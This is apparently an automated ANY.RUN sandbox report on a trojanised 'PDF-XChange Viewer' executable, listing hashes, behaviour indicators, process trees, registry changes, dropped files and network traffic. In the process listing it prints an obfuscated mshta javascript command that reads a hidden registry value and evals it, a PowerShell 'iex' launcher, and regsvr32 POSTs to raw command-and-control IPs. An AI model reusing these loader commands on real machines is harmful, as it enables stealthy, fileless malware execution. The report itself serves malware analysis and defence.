File name:

PDFXCview.exe

Full analysis: https://app.any.run/tasks/2756ebca-989d-484b-8aa7-8a1ffcaa913d
Verdict: Malicious activity
Analysis date: November 28, 2023, 08:53:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

15AF6227D39CA3F9D1DCD8566EFB0057

SHA1:

C8C3BF9ED944B614AE4B3E747E69E84026FB4039

SHA256:

40050153DCEEC2C8FBB1912F8EEABE449D1E265F0C8198008BE8B34E5403E731

SSDEEP:

12288:VucxREptsRP7KWAqpJsPykiJ4pO9DWNw/hXMRJobMksDldL4MJROlVMVdV72f:V1xRDRP7KWAAJsPy54pO9KNw/BMRJob3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Registers / Runs the DLL via REGSVR32.EXE

      • powershell.exe (PID: 1736)
      • regsvr32.exe (PID: 2252)
  • SUSPICIOUS

    • Executed via WMI

      • mshta.exe (PID: 2916)
    • Reads the Internet Settings

      • mshta.exe (PID: 2916)
      • regsvr32.exe (PID: 2252)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 2916)
    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 2916)
    • Powershell version downgrade attack

      • powershell.exe (PID: 1736)
    • Application launched itself

      • regsvr32.exe (PID: 2252)
    • Changes internet zones settings

      • regsvr32.exe (PID: 2252)
    • The process checks if it is being run in the virtual environment

      • regsvr32.exe (PID: 2252)
    • Connects to the server without a host name

      • regsvr32.exe (PID: 2252)
    • Reads settings of System Certificates

      • regsvr32.exe (PID: 2252)
  • INFO

    • Reads the machine GUID from the registry

      • PDFXCview.exe (PID: 2692)
      • wmpnscfg.exe (PID: 2844)
      • regedit.exe (PID: 3056)
    • Reads the computer name

      • PDFXCview.exe (PID: 2692)
      • wmpnscfg.exe (PID: 2844)
    • Checks supported languages

      • PDFXCview.exe (PID: 2692)
      • wmpnscfg.exe (PID: 2844)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2916)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2844)
      • explorer.exe (PID: 4040)
      • regedit.exe (PID: 3056)
      • reg.exe (PID: 2524)
      • regedit.exe (PID: 1160)
    • Creates files or folders in the user directory

      • regsvr32.exe (PID: 2252)
    • Create files in a temporary directory

      • regsvr32.exe (PID: 2252)
    • Reads security settings of Internet Explorer

      • regsvr32.exe (PID: 2252)
    • Checks proxy server information

      • regsvr32.exe (PID: 2252)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.3)
.dll | Win32 Dynamic Link Library (generic) (14.1)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2003:10:31 04:23:33+01:00
ImageFileCharacteristics: Executable, Bytes reversed lo, 32-bit
PEType: PE32
LinkerVersion: 2.23
CodeSize: 77824
InitializedDataSize: 370176
UninitializedDataSize: 246784
EntryPoint: 0x3dbb
OSVersion: 4
ImageVersion: 1
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.5.314.0
ProductVersionNumber: 2.5.0.0
FileFlagsMask: 0x0017
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Dynamic link library
FileSubtype: -
LanguageCode: Polish
CharacterSet: Windows, Latin2 (Eastern European)
CompanyName: Tracker Software Products (Canada) Ltd.
FileVersion: 2.5.0314.0000
LegalCopyright: Copyright (C) 2001-2015 by Tracker Software Products (Canada) Ltd.
LegalTrademarks: Tracker Software Products (Canada) Ltd.
ProductVersion: 2.5
SpecialBuild: -
PrivateBuild: -
ProductName: PDF-XChange Viewer
Comments: PDF-XChange Viewer
FileDescription: PDF-XChange Viewer
InternalName: PDF-XChange Viewer
OriginalFileName: PDFXCview.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
56
Monitored processes
10
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start pdfxcview.exe no specs mshta.exe no specs powershell.exe no specs regsvr32.exe regsvr32.exe no specs wmpnscfg.exe no specs explorer.exe no specs reg.exe no specs regedit.exe no specs regedit.exe

Process information

PID
CMD
Path
Indicators
Parent process
1160"C:\Windows\regedit.exe" C:\Windows\regedit.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Editor
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\regedit.exe
c:\windows\system32\ntdll.dll
1452"C:\Windows\system32\regsvr32.exe"C:\Windows\System32\regsvr32.exeregsvr32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
1736"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex $env:fedsqdbfC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2252regsvr32.exeC:\Windows\System32\regsvr32.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2524"C:\Windows\system32\reg.exe" C:\Windows\System32\reg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2692"C:\Users\admin\AppData\Local\Temp\PDFXCview.exe" C:\Users\admin\AppData\Local\Temp\PDFXCview.exeexplorer.exe
User:
admin
Company:
Tracker Software Products (Canada) Ltd.
Integrity Level:
MEDIUM
Description:
PDF-XChange Viewer
Exit code:
0
Version:
2.5.0314.0000
Modules
Images
c:\users\admin\appdata\local\temp\pdfxcview.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2844"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ole32.dll
2916"C:\Windows\system32\mshta.exe" javascript:GCQ0IFy="V0QIZn";FU0=new%20ActiveXObject("WScript.Shell");jq4V7Gw="Z";lwaR3=FU0.RegRead("HKCU\\software\\ZI901DLHo\\osUNUIspH");WB2HMvzR="X";eval(lwaR3);Nj1DEf="mRdro";C:\Windows\System32\mshta.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
3056"C:\Windows\regedit.exe" C:\Windows\regedit.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Editor
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\regedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
4040"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
7 153
Read events
7 018
Write events
129
Delete events
6

Modification events

(PID) Process:(2916) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2916) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2916) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2916) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1736) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2252) regsvr32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Operation:writeName:1206
Value:
3
(PID) Process:(2252) regsvr32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Operation:writeName:2300
Value:
1
(PID) Process:(2252) regsvr32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Operation:writeName:1809
Value:
0
(PID) Process:(2252) regsvr32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Operation:writeName:1206
Value:
0
(PID) Process:(2252) regsvr32.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Operation:writeName:2300
Value:
1
Executable files
0
Suspicious files
8
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
1736powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1be396.TMPbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
2252regsvr32.exeC:\Users\admin\AppData\Local\Temp\Tar4DC7.tmpcat
MD5:9441737383D21192400ECA82FDA910EC
SHA256:BC3A6E84E41FAEB57E7C21AA3B60C2A64777107009727C5B7C0ED8FE658909E5
2252regsvr32.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\5DBTIFB0.htmhtml
MD5:69BCA92002E27B0D40A9B66E33516247
SHA256:DA10CDE36FAA54ECA5CC8F8486BFE053782085B5B354F703D548AB389B0D2BDF
2252regsvr32.exeC:\Users\admin\AppData\Local\8d97a\832a3.battext
MD5:66C809339312365E1EE66C85D84952D2
SHA256:B2893BD085E1EA47C007460CD870A92D3258F4C30E396790A82DFEA59D900784
2252regsvr32.exeC:\Users\admin\AppData\Local\8d97a\d7a27.2a8af6binary
MD5:96971FD2CBB82DC6198BE28E487B2225
SHA256:AAC201F8929382176A1B778AC60B1CDB876968A8A90F7DCAC032FCC0EB552A51
2252regsvr32.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:25D8ABDFEF736A6EAA558DF9C076F0D8
SHA256:ABB0CA47CD30FB3A3DDB1FF1A6DE670B6DBF56FFB3E38D3E13EF844250D39D13
1736powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
1736powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U1A2MC76EX6T4CFMT7CU.tempbinary
MD5:16F6D260068B85896C0EBB2E1B2A60D1
SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
2252regsvr32.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:F3441B8572AAE8801C04F3060B550443
SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
2252regsvr32.exeC:\Users\admin\AppData\Local\Temp\Cab4DC6.tmpcompressed
MD5:F3441B8572AAE8801C04F3060B550443
SHA256:6720349E7D82EE0A8E73920D3C2B7CB2912D9FCF2EDB6FD98F2F12820158B0BF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
515
DNS requests
4
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2252
regsvr32.exe
POST
108.175.117.158:80
http://108.175.117.158/
unknown
unknown
2252
regsvr32.exe
POST
108.175.117.158:80
http://108.175.117.158/
unknown
unknown
1080
svchost.exe
GET
200
23.53.40.74:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f6ffd6d9ba22ce0c
unknown
compressed
4.66 Kb
unknown
2252
regsvr32.exe
GET
200
8.241.121.254:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?42fd5e53b7076651
unknown
compressed
61.6 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2588
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
2252
regsvr32.exe
110.222.43.109:443
China TieTong Telecommunications Corporation
CN
unknown
2252
regsvr32.exe
205.202.40.166:443
NETWORK NEBRASKA
US
unknown
2252
regsvr32.exe
5.124.9.56:80
Iran Cell Service and Communication Company
IR
unknown
2252
regsvr32.exe
165.138.181.166:443
ENA
US
unknown
2252
regsvr32.exe
72.219.240.211:80
ASN-CXA-ALL-CCI-22773-RDC
US
unknown
2252
regsvr32.exe
149.253.75.67:443
DNIC-AS-00749
US
unknown

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared
ctldl.windowsupdate.com
  • 23.53.40.74
  • 23.53.40.75
  • 23.53.40.49
  • 23.53.40.83
  • 23.53.40.56
  • 23.53.40.42
  • 23.53.40.82
  • 23.53.40.81
  • 23.53.40.72
  • 8.241.121.254
  • 67.27.159.254
  • 8.241.122.254
  • 8.238.190.126
  • 67.27.159.126
whitelisted

Threats

PID
Process
Class
Message
2252
regsvr32.exe
Generic Protocol Command Decode
SURICATA HTTP Request line incomplete
2252
regsvr32.exe
Potentially Bad Traffic
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
2252
regsvr32.exe
Potentially Bad Traffic
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
No debug info